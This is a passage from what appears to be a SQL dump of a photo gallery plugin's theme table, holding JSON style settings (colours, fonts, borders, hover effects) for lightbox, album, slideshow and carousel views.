6px\",\"page_nav_button_bg_color\":\"FFFFFF\",\"page_nav_button_bg_transparent\":\"100\",\"page_nav_box_shadow\":\"0\",\"page_nav_button_transition\":\"1\",\"page_nav_button_text\":\"0\",\"lightbox_overlay_bg_color\":\"000000\",\"lightbox_overlay_bg_transparent\":\"70\",\"lightbox_bg_color\":\"000000\",\"lightbox_ctrl_btn_pos\":\"bottom\",\"lightbox_ctrl_btn_align\":\"center\",\"lightbox_ctrl_btn_height\":\"20\",\"lightbox_ctrl_btn_margin_top\":\"10\",\"lightbox_ctrl_btn_margin_left\":\"7\",\"lightbox_ctrl_btn_transparent\":\"100\",\"lightbox_ctrl_btn_color\":\"FFFFFF\",\"lightbox_toggle_btn_height\":\"14\",\"lightbox_toggle_btn_width\":\"100\",\"lightbox_ctrl_cont_bg_color\":\"000000\",\"lightbox_ctrl_cont_transparent\":\"65\",\"lightbox_ctrl_cont_border_radius\":\"4\",\"lightbox_close_btn_transparent\":\"100\",\"lightbox_close_btn_bg_color\":\"000000\",\"lightbox_close_btn_border_width\":\"2\",\"lightbox_close_btn_border_radius\":\"16px\",\"lightbox_close_btn_border_style\":\"none\",\"lightbox_close_btn_border_color\":\"FFFFFF\",\"lightbox_close_btn_box_shadow\":\"0\",\"lightbox_close_btn_color\":\"FFFFFF\",\"lightbox_close_btn_size\":\"10\",\"lightbox_close_btn_width\":\"20\",\"lightbox_close_btn_height\":\"20\",\"lightbox_close_btn_top\":\"-10\",\"lightbox_close_btn_right\":\"-10\",\"lightbox_close_btn_full_color\":\"FFFFFF\",\"lightbox_rl_btn_bg_color\":\"000000\",\"lightbox_rl_btn_transparent\":\"80\",\"lightbox_rl_btn_border_radius\":\"20px\",\"lightbox_rl_btn_border_width\":\"0\",\"lightbox_rl_btn_border_style\":\"none\",\"lightbox_rl_btn_border_color\":\"FFFFFF\",\"lightbox_rl_btn_box_shadow\":\"\",\"lightbox_rl_btn_color\":\"FFFFFF\",\"lightbox_rl_btn_height\":\"40\",\"lightbox_rl_btn_width\":\"40\",\"lightbox_rl_btn_size\":\"20\",\"lightbox_close_rl_btn_hover_color\":\"CCCCCC\",\"lightbox_comment_pos\":\"left\",\"lightbox_comment_width\":\"400\",\"lightbox_comment_bg_color\":\"000000\",\"lightbox_comment_font_color\":\"CCCCCC\",\"lightbox_comment_font_style\":\"segoe ui\",\"lightbox_comment_font_size\":\"12\",\"lightbox_comment_button_bg_color\":\"616161\",\"lightbox_comment_button_border_color\":\"666666\",\"lightbox_comment_button_border_width\":\"1\",\"lightbox_comment_button_border_style\":\"none\",\"lightbox_comment_button_border_radius\":\"3px\",\"lightbox_comment_button_padding\":\"3px 10px\",\"lightbox_comment_input_bg_color\":\"333333\",\"lightbox_comment_input_border_color\":\"666666\",\"lightbox_comment_input_border_width\":\"1\",\"lightbox_comment_input_border_style\":\"none\",\"lightbox_comment_input_border_radius\":\"0\",\"lightbox_comment_input_padding\":\"2px\",\"lightbox_comment_separator_width\":\"1\",\"lightbox_comment_separator_style\":\"solid\",\"lightbox_comment_separator_color\":\"383838\",\"lightbox_comment_author_font_size\":\"14\",\"lightbox_comment_date_font_size\":\"10\",\"lightbox_comment_body_font_size\":\"12\",\"lightbox_comment_share_button_color\":\"CCCCCC\",\"lightbox_filmstrip_pos\":\"top\",\"lightbox_filmstrip_rl_bg_color\":\"3B3B3B\",\"lightbox_filmstrip_rl_btn_size\":\"20\",\"lightbox_filmstrip_rl_btn_color\":\"FFFFFF\",\"lightbox_filmstrip_thumb_margin\":\"0 1px\",\"lightbox_filmstrip_thumb_border_width\":\"1\",\"lightbox_filmstrip_thumb_border_style\":\"solid\",\"lightbox_filmstrip_thumb_border_color\":\"000000\",\"lightbox_filmstrip_thumb_border_radius\":\"0\",\"lightbox_filmstrip_thumb_deactive_transparent\":\"80\",\"lightbox_filmstrip_thumb_active_border_width\":\"0\",\"lightbox_filmstrip_thumb_active_border_color\":\"FFFFFF\",\"lightbox_rl_btn_style\":\"fa-chevron\",\"album_compact_back_font_color\":\"000000\",\"album_compact_back_font_style\":\"segoe ui\",\"album_compact_back_font_size\":\"16\",\"album_compact_back_font_weight\":\"bold\",\"album_compact_back_padding\":\"0\",\"album_compact_title_font_color\":\"CCCCCC\",\"album_compact_title_font_style\":\"segoe ui\",\"album_compact_thumb_title_pos\":\"bottom\",\"album_compact_title_font_size\":\"16\",\"album_compact_title_font_weight\":\"bold\",\"album_compact_title_margin\":\"2px\",\"album_compact_title_shadow\":\"0px 0px 0px #888888\",\"album_compact_thumb_margin\":\"4\",\"album_compact_thumb_padding\":\"0\",\"album_compact_thumb_border_radius\":\"0\",\"album_compact_thumb_border_width\":\"0\",\"album_compact_thumb_border_style\":\"none\",\"album_compact_thumb_border_color\":\"CCCCCC\",\"album_compact_thumb_bg_color\":\"FFFFFF\",\"album_compact_thumbs_bg_color\":\"FFFFFF\",\"album_compact_thumb_bg_transparent\":\"0\",\"album_compact_thumb_box_shadow\":\"0px 0px 0px #888888\",\"album_compact_thumb_transparent\":\"100\",\"album_compact_thumb_align\":\"center\",\"album_compact_thumb_hover_effect\":\"scale\",\"album_compact_thumb_hover_effect_value\":\"1.1\",\"album_compact_thumb_transition\":\"0\",\"album_extended_thumb_margin\":\"2\",\"album_extended_thumb_padding\":\"0\",\"album_extended_thumb_border_radius\":\"0\",\"album_extended_thumb_border_width\":\"0\",\"album_extended_thumb_border_style\":\"none\",\"album_extended_thumb_border_color\":\"CCCCCC\",\"album_extended_thumb_bg_color\":\"FFFFFF\",\"album_extended_thumbs_bg_color\":\"FFFFFF\",\"album_extended_thumb_bg_transparent\":\"0\",\"album_extended_thumb_box_shadow\":\"\",\"album_extended_thumb_transparent\":\"100\",\"album_extended_thumb_align\":\"left\",\"album_extended_thumb_hover_effect\":\"scale\",\"album_extended_thumb_hover_effect_value\":\"1.1\",\"album_extended_thumb_transition\":\"0\",\"album_extended_back_font_color\":\"000000\",\"album_extended_back_font_style\":\"segoe ui\",\"album_extended_back_font_size\":\"20\",\"album_extended_back_font_weight\":\"bold\",\"album_extended_back_padding\":\"0\",\"album_extended_div_bg_color\":\"FFFFFF\",\"album_extended_div_bg_transparent\":\"0\",\"album_extended_div_border_radius\":\"0 0 0 0\",\"album_extended_div_margin\":\"0 0 5px 0\",\"album_extended_div_padding\":\"10\",\"album_extended_div_separator_width\":\"1\",\"album_extended_div_separator_style\":\"solid\",\"album_extended_div_separator_color\":\"E0E0E0\",\"album_extended_thumb_div_bg_color\":\"FFFFFF\",\"album_extended_thumb_div_border_radius\":\"0\",\"album_extended_thumb_div_border_width\":\"1\",\"album_extended_thumb_div_border_style\":\"solid\",\"album_extended_thumb_div_border_color\":\"E8E8E8\",\"album_extended_thumb_div_padding\":\"5px\",\"album_extended_text_div_bg_color\":\"FFFFFF\",\"album_extended_text_div_border_radius\":\"0\",\"album_extended_text_div_border_width\":\"1\",\"album_extended_text_div_border_style\":\"solid\",\"album_extended_text_div_border_color\":\"E8E8E8\",\"album_extended_text_div_padding\":\"5px\",\"album_extended_title_span_border_width\":\"1\",\"album_extended_title_span_border_style\":\"none\",\"album_extended_title_span_border_color\":\"CCCCCC\",\"album_extended_title_font_color\":\"000000\",\"album_extended_title_font_style\":\"segoe ui\",\"album_extended_title_font_size\":\"16\",\"album_extended_title_font_weight\":\"bold\",\"album_extended_title_margin_bottom\":\"2\",\"album_extended_title_padding\":\"2px\",\"album_extended_desc_span_border_width\":\"1\",\"album_extended_desc_span_border_style\":\"none\",\"album_extended_desc_span_border_color\":\"CCCCCC\",\"album_extended_desc_font_color\":\"000000\",\"album_extended_desc_font_style\":\"segoe ui\",\"album_extended_desc_font_size\":\"14\",\"album_extended_desc_font_weight\":\"normal\",\"album_extended_desc_padding\":\"2px\",\"album_extended_desc_more_color\":\"F2D22E\",\"album_extended_desc_more_size\":\"12\",\"masonry_thumb_padding\":\"4\",\"masonry_thumb_border_radius\":\"0\",\"masonry_thumb_border_width\":\"0\",\"masonry_thumb_border_style\":\"none\",\"masonry_thumb_border_color\":\"CCCCCC\",\"masonry_thumbs_bg_color\":\"FFFFFF\",\"masonry_thumb_bg_transparent\":\"0\",\"masonry_thumb_transparent\":\"100\",\"masonry_thumb_align\":\"center\",\"masonry_thumb_hover_effect\":\"scale\",\"masonry_thumb_hover_effect_value\":\"1.1\",\"masonry_thumb_transition\":\"0\",\"mosaic_thumb_padding\":\"4\",\"mosaic_thumb_border_radius\":\"0\",\"mosaic_thumb_border_width\":\"0\",\"mosaic_thumb_border_style\":\"none\",\"mosaic_thumb_border_color\":\"CCCCCC\",\"mosaic_thumbs_bg_color\":\"FFFFFF\",\"mosaic_thumb_bg_transparent\":\"0\",\"mosaic_thumb_transparent\":\"100\",\"mosaic_thumb_align\":\"center\",\"mosaic_thumb_hover_effect\":\"scale\",\"mosaic_thumb_hover_effect_value\":\"1.1\",\"mosaic_thumb_title_font_color\":\"CCCCCC\",\"mosaic_thumb_title_font_style\":\"segoe ui\",\"mosaic_thumb_title_font_size\":\"16\",\"mosaic_thumb_title_font_weight\":\"bold\",\"mosaic_thumb_title_margin\":\"2px\",\"mosaic_thumb_title_shadow\":\"0px 0px 0px #888888\",\"slideshow_cont_bg_color\":\"000000\",\"slideshow_close_btn_transparent\":\"100\",\"slideshow_rl_btn_bg_color\":\"000000\",\"slideshow_rl_btn_border_radius\":\"20px\",\"slideshow_rl_btn_border_width\":\"0\",\"slideshow_rl_btn_border_style\":\"none\",\"slideshow_rl_btn_border_color\":\"FFFFFF\",\"slideshow_rl_btn_box_shadow\":\"0px 0px 0px #000000\",\"slideshow_rl_btn_color\":\"FFFFFF\",\"slideshow_rl_btn_height\":\"40\",\"slideshow_rl_btn_size\":\"20\",\"slideshow_rl_btn_width\":\"40\",\"slideshow_close_rl_btn_hover_color\":\"CCCCCC\",\"slideshow_filmstrip_pos\":\"top\",\"slideshow_filmstrip_thumb_border_width\":\"1\",\"slideshow_filmstrip_thumb_border_style\":\"solid\",\"slideshow_filmstrip_thumb_border_color\":\"000000\",\"slideshow_filmstrip_thumb_border_radius\":\"0\",\"slideshow_filmstrip_thumb_margin\":\"0 1px\",\"slideshow_filmstrip_thumb_active_border_width\":\"0\",\"slideshow_filmstrip_thumb_active_border_color\":\"FFFFFF\",\"slideshow_filmstrip_thumb_deactive_transparent\":\"80\",\"slideshow_filmstrip_rl_bg_color\":\"3B3B3B\",\"slideshow_filmstrip_rl_btn_color\":\"FFFFFF\",\"slideshow_filmstrip_rl_btn_size\":\"20\",\"slideshow_title_font_size\":\"16\",\"slideshow_title_font\":\"segoe ui\",\"slideshow_title_color\":\"FFFFFF\",\"slideshow_title_opacity\":\"70\",\"slideshow_title_border_radius\":\"5px\",\"slideshow_title_background_color\":\"000000\",\"slideshow_title_padding\":\"0 0 0 0\",\"slideshow_description_font_size\":\"14\",\"slideshow_description_font\":\"segoe ui\",\"slideshow_description_color\":\"FFFFFF\",\"slideshow_description_opacity\":\"70\",\"slideshow_description_border_radius\":\"0\",\"slideshow_description_background_color\":\"000000\",\"slideshow_description_padding\":\"5px 10px 5px 10px\",\"slideshow_dots_width\":\"12\",\"slideshow_dots_height\":\"12\",\"slideshow_dots_border_radius\":\"5px\",\"slideshow_dots_background_color\":\"F2D22E\",\"slideshow_dots_margin\":\"3\",\"slideshow_dots_active_background_color\":\"FFFFFF\",\"slideshow_dots_active_border_width\":\"1\",\"slideshow_dots_active_border_color\":\"000000\",\"slideshow_play_pause_btn_size\":\"60\",\"slideshow_rl_btn_style\":\"fa-chevron\",\"blog_style_margin\":\"2px\",\"blog_style_padding\":\"0\",\"blog_style_border_radius\":\"0\",\"blog_style_border_width\":\"1\",\"blog_style_border_style\":\"solid\",\"blog_style_border_color\":\"F5F5F5\",\"blog_style_bg_color\":\"FFFFFF\",\"blog_style_box_shadow\":\"\",\"blog_style_transparent\":\"80\",\"blog_style_align\":\"center\",\"blog_style_share_buttons_bg_color\":\"FFFFFF\",\"blog_style_share_buttons_margin\":\"5px auto 10px auto\",\"blog_style_share_buttons_border_radius\":\"0\",\"blog_style_share_buttons_border_width\":\"0\",\"blog_style_share_buttons_border_style\":\"none\",\"blog_style_share_buttons_border_color\":\"000000\",\"blog_style_share_buttons_align\":\"right\",\"blog_style_img_font_size\":\"16\",\"blog_style_img_font_family\":\"segoe ui\",\"blog_style_img_font_color\":\"000000\",\"blog_style_share_buttons_color\":\"B3AFAF\",\"blog_style_share_buttons_bg_transparent\":\"0\",\"blog_style_share_buttons_font_size\":\"20\",\"image_browser_margin\":\"2px auto\",\"image_browser_padding\":\"4px\",\"image_browser_border_radius\":\"0\",\"image_browser_border_width\":\"1\",\"image_browser_border_style\":\"none\",\"image_browser_border_color\":\"F5F5F5\",\"image_browser_bg_color\":\"EBEBEB\",\"image_browser_box_shadow\":\"\",\"image_browser_transparent\":\"80\",\"image_browser_align\":\"center\",\"image_browser_image_description_margin\":\"0px 5px 0px 5px\",\"image_browser_image_description_padding\":\"8px 8px 8px 8px\",\"image_browser_image_description_border_radius\":\"0\",\"image_browser_image_description_border_width\":\"1\",\"image_browser_image_description_border_style\":\"none\",\"image_browser_image_description_border_color\":\"FFFFFF\",\"image_browser_image_description_bg_color\":\"EBEBEB\",\"image_browser_image_description_align\":\"center\",\"image_browser_img_font_size\":\"15\",\"image_browser_img_font_family\":\"segoe ui\",\"image_browser_img_font_color\":\"000000\",\"image_browser_full_padding\":\"4px\",\"image_browser_full_border_radius\":\"0\",\"image_browser_full_border_width\":\"2\",\"image_browser_full_border_style\":\"none\",\"image_browser_full_border_color\":\"F7F7F7\",\"image_browser_full_bg_color\":\"F5F5F5\",\"image_browser_full_transparent\":\"90\",\"lightbox_info_pos\":\"top\",\"lightbox_info_align\":\"right\",\"lightbox_info_bg_color\":\"000000\",\"lightbox_info_bg_transparent\":\"70\",\"lightbox_info_border_width\":\"1\",\"lightbox_info_border_style\":\"none\",\"lightbox_info_border_color\":\"000000\",\"lightbox_info_border_radius\":\"5px\",\"lightbox_info_padding\":\"5px\",\"lightbox_info_margin\":\"15px\",\"lightbox_title_color\":\"FFFFFF\",\"lightbox_title_font_style\":\"segoe ui\",\"lightbox_title_font_weight\":\"bold\",\"lightbox_title_font_size\":\"18\",\"lightbox_description_color\":\"FFFFFF\",\"lightbox_description_font_style\":\"segoe ui\",\"lightbox_description_font_weight\":\"normal\",\"lightbox_description_font_size\":\"14\",\"lightbox_rate_pos\":\"bottom\",\"lightbox_rate_align\":\"right\",\"lightbox_rate_icon\":\"star\",\"lightbox_rate_color\":\"F9D062\",\"lightbox_rate_size\":\"20\",\"lightbox_rate_stars_count\":\"5\",\"lightbox_rate_padding\":\"15px\",\"lightbox_rate_hover_color\":\"F7B50E\",\"lightbox_hit_pos\":\"bottom\",\"lightbox_hit_align\":\"left\",\"lightbox_hit_bg_color\":\"000000\",\"lightbox_hit_bg_transparent\":\"70\",\"lightbox_hit_border_width\":\"1\",\"lightbox_hit_border_style\":\"none\",\"lightbox_hit_border_color\":\"000000\",\"lightbox_hit_border_radius\":\"5px\",\"lightbox_hit_padding\":\"5px\",\"lightbox_hit_margin\":\"0 5px\",\"lightbox_hit_color\":\"FFFFFF\",\"lightbox_hit_font_style\":\"segoe ui\",\"lightbox_hit_font_weight\":\"normal\",\"lightbox_hit_font_size\":\"14\",\"masonry_description_font_size\":\"12\",\"masonry_description_color\":\"CCCCCC\",\"masonry_description_font_style\":\"segoe ui\",\"album_masonry_back_font_color\":\"000000\",\"album_masonry_back_font_style\":\"segoe ui\",\"album_masonry_back_font_size\":\"16\",\"album_masonry_back_font_weight\":\"bold\",\"album_masonry_back_padding\":\"0\",\"album_masonry_title_font_color\":\"CCCCCC\",\"album_masonry_title_font_style\":\"segoe ui\",\"album_masonry_thumb_title_pos\":\"bottom\",\"album_masonry_title_font_size\":\"16\",\"album_masonry_title_font_weight\":\"bold\",\"album_masonry_title_margin\":\"2px\",\"album_masonry_title_shadow\":\"0px 0px 0px #888888\",\"album_masonry_thumb_margin\":\"4\",\"album_masonry_thumb_padding\":\"0\",\"album_masonry_thumb_border_radius\":\"0\",\"album_masonry_thumb_border_width\":\"0\",\"album_masonry_thumb_border_style\":\"none\",\"album_masonry_thumb_border_color\":\"CCCCCC\",\"album_masonry_thumb_bg_color\":\"FFFFFF\",\"album_masonry_thumbs_bg_color\":\"FFFFFF\",\"album_masonry_thumb_bg_transparent\":\"0\",\"album_masonry_thumb_box_shadow\":\"0px 0px 0px #888888\",\"album_masonry_thumb_transparent\":\"100\",\"album_masonry_thumb_align\":\"center\",\"album_masonry_thumb_hover_effect\":\"scale\",\"album_masonry_thumb_hover_effect_value\":\"1.1\",\"album_masonry_thumb_transition\":\"0\",\"carousel_cont_bg_color\":\"000000\",\"carousel_cont_btn_transparent\":\"0\",\"carousel_close_btn_transparent\":\"100\",\"carousel_rl_btn_bg_color\":\"000000\",\"carousel_rl_btn_border_radius\":\"20px\",\"carousel_rl_btn_border_width\":\"0\",\"carousel_rl_btn_border_style\":\"none\",\"carousel_rl_btn_border_color\":\"FFFFFF\",\"carousel_rl_btn_color\":\"FFFFFF\",\"carousel_rl_btn_height\":\"40\",\"carousel_rl_btn_size\":\"20\",\"carousel_play_pause_btn_size\":\"20\",\"carousel_rl_btn_width\":\"40\",\"carousel_close_rl_btn_hover_color\":\"CCCCCC\",\"carousel_rl_btn_style\":\"fa-chevron\",\"carousel_mergin_bottom\":\"0.5\",\"carousel_font_family\":\"Arial\",\"carousel_feature_border_width\":\"2\",\"carousel_feature_border_style\":\"solid\",\"carousel_feature_border_color\":\"5D204F\",\"carousel_caption_background_color\":\"000000\",\"carousel_caption_bottom\":\"0\",\"carousel_caption_p_mergin\":\"0\",\"carousel_caption_p_pedding\":\"5\",\"carousel_caption_p_font_weight\":\"bold\",\"carousel_caption_p_font_size\":\"14\",\"carousel_caption_p_color\":\"white\",\"carousel_title_opacity\":\"100\",\"carousel_title_border_radius\":\"5px\",\"mosaic_thumb_transition\":\"1\"}'),(2,'Theme 2',0,'{\"thumb_margin\":\"4\",\"thumb_padding\":\"4\",\"thumb_border_radius\":\"0\",\"thumb_border_width\":\"5\",\"thumb_border_style\":\"none\",\"thumb_border_color\":\"FFFFFF\",\"thumb_bg_color\":\"E8E8E8\",\"thumbs_bg_color\":\"FFFFFF\",\"thumb_bg_transparent\":\"0\",\"thumb_box_shadow\":\"0px 0px 0px #888888\",\"thumb_transparent\":\"100\",\"thumb_align\":\"center\",\"thumb_hover_effect\":\"rotate\",\"thumb_hover_effect_value\":\"2deg\",\"thumb_transition\":\"1\",\"thumb_title_font_color\":\"CCCCCC\",\"thumb_title_font_style\":\"segoe ui\",\"thumb_title_pos\":\"bottom\",\"thumb_title_font_size\":\"16\",\"thumb_title_font_weight\":\"bold\",\"thumb_title_margin\":\"5px\",\"thumb_title_shadow\":\"\",\"page_nav_position\":\"bottom\",\"page_nav_align\":\"center\",\"page_nav_number\":\"0\",\"page_nav_font_size\":\"12\",\"page_nav_font_style\":\"segoe ui\",\"page_nav_font_color\":\"666666\",\"page_nav_font_weight\":\"bold\",\"page_nav_border_width\":\"1\",\"page_nav_border_style\":\"none\",\"page_nav_border_color\":\"E3E3E3\",\"page_nav_border_radius\":\"0\",\"page_nav_margin\":\"0\",\"page_nav_padding\":\"3px 6px\",\"page_nav_button_bg_color\":\"FCFCFC\",\"page_nav_button_bg_transparent\":\"100\",\"page_nav_box_shadow\":\"0\",\"page_nav_button_transition\":\"1\",\"page_nav_button_text\":\"0\",\"lightbox_overlay_bg_color\":\"000000\",\"lightbox_overlay_bg_transparent\":\"70\",\"lightbox_bg_color\":\"000000\",\"lightbox_ctrl_btn_pos\":\"bottom\",\"lightbox_ctrl_btn_align\":\"center\",\"lightbox_ctrl_btn_height\":\"20\",\"lightbox_ctrl_btn_margin_top\":\"10\",\"lightbox_ctrl_btn_margin_left\":\"7\",\"lightbox_ctrl_btn_transparent\":\"80\",\"lightbox_ctrl_btn_color\":\"FFFFFF\",\"lightbox_toggle_btn_height\":\"14\",\"lightbox_toggle_btn_width\":\"100\",\"lightbox_ctrl_cont_bg_color\":\"000000\",\"lightbox_ctrl_cont_transparent\":\"80\",\"lightbox_ctrl_cont_border_radius\":\"4\",\"lightbox_close_btn_transparent\":\"95\",\"lightbox_close_btn_bg_color\":\"000000\",\"lightbox_close_btn_border_width\":\"0\",\"lightbox_close_btn_border_radius\":\"16px\",\"lightbox_close_btn_border_style\":\"none\",\"lightbox_close_btn_border_color\":\"FFFFFF\",\"lightbox_close_btn_box_shadow\":\"\",\"lightbox_close_btn_color\":\"FFFFFF\",\"lightbox_close_btn_size\":\"10\",\"lightbox_close_btn_width\":\"20\",\"lightbox_close_btn_height\":\"20\",\"lightbox_close_btn_top\":\"-10\",\"lightbox_close_btn_right\":\"-10\",\"lightbox_close_btn_full_color\":\"FFFFFF\",\"lightbox_rl_btn_bg_color\":\"000000\",\"lightbox_rl_btn_transparent\":\"80\",\"lightbox_rl_btn_border_radius\":\"20px\",\"lightbox_rl_btn_border_width\":\"2\",\"lightbox_rl_btn_border_style\":\"none\",\"lightbox_rl_btn_border_color\":\"FFFFFF\",\"lightbox_rl_btn_box_shadow\":\"\",\"lightbox_rl_btn_color\":\"FFFFFF\",\"lightbox_rl_btn_height\":\"40\",\"lightbox_rl_btn_width\":\"40\",\"lightbox_rl_btn_size\":\"20\",\"lightbox_close_rl_btn_hover_color\":\"FFFFFF\",\"lightbox_comment_pos\":\"left\",\"lightbox_comment_width\":\"400\",\"lightbox_comment_bg_color\":\"000000\",\"lightbox_comment_font_color\":\"CCCCCC\",\"lightbox_comment_font_style\":\"arial\",\"lightbox_comment_font_size\":\"12\",\"lightbox_comment_button_bg_color\":\"333333\",\"lightbox_comment_button_border_color\":\"666666\",\"lightbox_comment_button_border_width\":\"1\",\"lightbox_comment_button_border_style\":\"none\",\"lightbox_comment_button_border_radius\":\"3px\",\"lightbox_comment_button_padding\":\"3px 10px\",\"lightbox_comment_input_bg_color\":\"333333\",\"lightbox_comment_input_border_color\":\"666666\",\"lightbox_comment_input_border_width\":\"1\",\"lightbox_comment_input_border_style\":\"none\",\"lightbox_comment_input_border_radius\":\"0\",\"lightbox_comment_input_padding\":\"3px\",\"lightbox_comment_separator_width\":\"1\",\"lightbox_comment_separator_style\":\"solid\",\"lightbox_comment_separator_color\":\"2B2B2B\",\"lightbox_comment_author_font_size\":\"14\",\"lightbox_comment_date_font_size\":\"10\",\"lightbox_comment_body_font_size\":\"12\",\"lightbox_comment_share_button_color\":\"FFFFFF\",\"lightbox_filmstrip_pos\":\"top\",\"lightbox_filmstrip_rl_bg_color\":\"2B2B2B\",\"lightbox_filmstrip_rl_btn_size\":\"20\",\"lightbox_filmstrip_rl_btn_color\":\"FFFFFF\",\"lightbox_filmstrip_thumb_margin\":\"0 1px\",\"lightbox_filmstrip_thumb_border_width\":\"1\",\"lightbox_filmstrip_thumb_border_style\":\"none\",\"lightbox_filmstrip_thumb_border_color\":\"000000\",\"lightbox_filmstrip_thumb_border_radius\":\"0\",\"lightbox_filmstrip_thumb_deactive_transparent\":\"80\",\"lightbox_filmstrip_thumb_active_border_width\":\"0\",\"lightbox_filmstrip_thumb_active_border_color\":\"FFFFFF\",\"lightbox_rl_btn_style\":\"fa-chevron\",\"album_compact_back_font_color\":\"000000\",\"album_compact_back_font_style\":\"segoe ui\",\"album_compact_back_font_size\":\"14\",\"album_compact_back_font_weight\":\"normal\",\"album_compact_back_padding\":\"0\",\"album_compact_title_font_color\":\"CCCCCC\",\"album_compact_title_font_style\":\"segoe ui\",\"album_compact_thumb_title_pos\":\"bottom\",\"album_compact_title_font_size\":\"16\",\"album_compact_title_font_weight\":\"bold\",\"album_compact_title_margin\":\"5px\",\"album_compact_title_shadow\":\"\",\"album_compact_thumb_margin\":\"4\",\"album_compact_thumb_padding\":\"4\",\"album_compact_thumb_border_radius\":\"0\",\"album_compact_thumb_border_width\":\"1\",\"album_compact_thumb_border_style\":\"none\",\"album_compact_thumb_border_color\":\"000000\",\"album_compact_thumb_bg_color\":\"E8E8E8\",\"album_compact_thumbs_bg_color\":\"FFFFFF\",\"album_compact_thumb_bg_transparent\":\"100\",\"album_compact_thumb_box_shadow\":\"\",\"album_compact_thumb_transparent\":\"100\",\"album_compact_thumb_align\":\"center\",\"album_compact_thumb_hover_effect\":\"rotate\",\"album_compact_thumb_hover_effect_value\":\"2deg\",\"album_compact_thumb_transition\":\"1\",\"album_extended_thumb_margin\":\"2\",\"album_extended_thumb_padding\":\"4\",\"album_extended_thumb_border_radius\":\"0\",\"album_extended_thumb_border_width\":\"4\",\"album_extended_thumb_border_style\":\"none\",\"album_extended_thumb_border_color\":\"E8E8E8\",\"album_extended_thumb_bg_color\":\"E8E8E8\",\"album_extended_thumbs_bg_color\":\"FFFFFF\",\"album_extended_thumb_bg_transparent\":\"100\",\"album_extended_thumb_box_shadow\":\"\",\"album_extended_thumb_transparent\":\"100\",\"album_extended_thumb_align\":\"left\",\"album_extended_thumb_hover_effect\":\"rotate\",\"album_extended_thumb_hover_effect_value\":\"2deg\",\"album_extended_thumb_transition\":\"0\",\"album_extended_back_font_color\":\"000000\",\"album_extended_back_font_style\":\"segoe ui\",\"album_extended_back_font_size\":\"16\",\"album_extended_back_font_weight\":\"bold\",\"album_extended_back_padding\":\"0\",\"album_extended_div_bg_color\":\"FFFFFF\",\"album_extended_div_bg_transparent\":\"0\",\"album_extended_div_border_radius\":\"0\",\"album_extended_div_margin\":\"0 0 5px 0\",\"album_extended_div_padding\":\"10\",\"album_extended_div_separator_width\":\"1\",\"album_extended_div_separator_style\":\"none\",\"album_extended_div_separator_color\":\"CCCCCC\",\"album_extended_thumb_div_bg_color\":\"FFFFFF\",\"album_extended_thumb_div_border_radius\":\"0\",\"album_extended_thumb_div_border_width\":\"0\",\"album_extended_thumb_div_border_style\":\"none\",\"album_extended_thumb_div_border_color\":\"CCCCCC\",\"album_extended_thumb_div_padding\":\"0\",\"album_extended_text_div_bg_color\":\"FFFFFF\",\"album_extended_text_div_border_radius\":\"0\",\"album_extended_text_div_border_width\":\"1\",\"album_extended_text_div_border_style\":\"none\",\"album_extended_text_div_border_color\":\"CCCCCC\",\"album_extended_text_div_padding\":\"5px\",\"album_extended_title_span_border_width\":\"1\",\"album_extended_title_span_border_style\":\"none\",\"album_extended_title_span_border_color\":\"CCCCCC\",\"album_extended_title_font_color\":\"000000\",\"album_extended_title_font_style\":\"segoe ui\",\"album_extended_title_font_size\":\"16\",\"album_extended_title_font_weight\":\"bold\",\"album_extended_title_margin_bottom\":\"2\",\"album_extended_title_padding\":\"2px\",\"album_extended_desc_span_border_width\":\"1\",\"album_extended_desc_span_border_style\":\"none\",\"album_extended_desc_span_border_color\":\"CCCCCC\",\"album_extended_desc_font_color\":\"000000\",\"album_extended_desc_font_style\":\"segoe ui\",\"album_extended_desc_font_size\":\"14\",\"album_extended_desc_font_weight\":\"normal\",\"album_extended_desc_padding\":\"2px\",\"album_extended_desc_more_color\":\"FFC933\",\"album_extended_desc_more_size\":\"12\",\"masonry_thumb_padding\":\"4\",\"masonry_thumb_border_radius\":\"2px\",\"masonry_thumb_border_width\":\"1\",\"masonry_thumb_border_style\":\"none\",\"masonry_thumb_border_color\":\"CCCCCC\",\"masonry_thumbs_bg_color\":\"FFFFFF\",\"masonry_thumb_bg_transparent\":\"0\",\"masonry_thumb_transparent\":\"80\",\"masonry_thumb_align\":\"center\",\"masonry_thumb_hover_effect\":\"rotate\",\"masonry_thumb_hover_effect_value\":\"2deg\",\"masonry_thumb_transition\":\"0\",\"mosaic_thumb_padding\":\"4\",\"mosaic_thumb_border_radius\":\"2px\",\"mosaic_thumb_border_width\":\"1\",\"mosaic_thumb_border_style\":\"none\",\"mosaic_thumb_border_color\":\"CCCCCC\",\"mosaic_thumbs_bg_color\":\"FFFFFF\",\"mosaic_thumb_bg_transparent\":\"0\",\"mosaic_thumb_transparent\":\"80\",\"mosaic_thumb_align\":\"center\",\"mosaic_thumb_hover_effect\":\"rotate\",\"mosaic_thumb_hover_effect_value\":\"2deg\",\"mosaic_thumb_title_font_color\":\"CCCCCC\",\"mosaic_thumb_title_font_style\":\"segoe ui\",\"mosaic_thumb_title_font_size\":\"16\",\"mosaic_thumb_title_font_weight\":\"bold\",\"mosaic_thumb_title_margin\":\"2px\",\"mosaic_thumb_title_shadow\":\"0px 0px 0px #888888\",\"slideshow_cont_bg_color\":\"000000\",\"slideshow_close_btn_transparent\":\"100\",\"slideshow_rl_btn_bg_color\":\"000000\",\"slideshow_rl_btn_border_radius\":\"20px\",\"slideshow_rl_btn_border_width\":\"0\",\"slideshow_rl_btn_border_style\":\"none\",\"slideshow_rl_btn_border_color\":\"FFFFFF\",\"slideshow_rl_btn_box_shadow\":\"\",\"slideshow_rl_btn_color\":\"FFFFFF\",\"slideshow_rl_btn_height\":\"40\",\"slideshow_rl_btn_size\":\"20\",\"slideshow_rl_btn_width\":\"40\",\"slideshow_close_rl_btn_hover_color\":\"DBDBDB\",\"slideshow_filmstrip_pos\":\"bottom\",\"slideshow_filmstrip_thumb_border_width\":\"1\",\"slideshow_filmstrip_thumb_border_style\":\"none\",\"slideshow_filmstrip_thumb_border_color\":\"000000\",\"slideshow_filmstrip_thumb_border_radius\":\"0\",\"slideshow_filmstrip_thumb_margin\":\"0 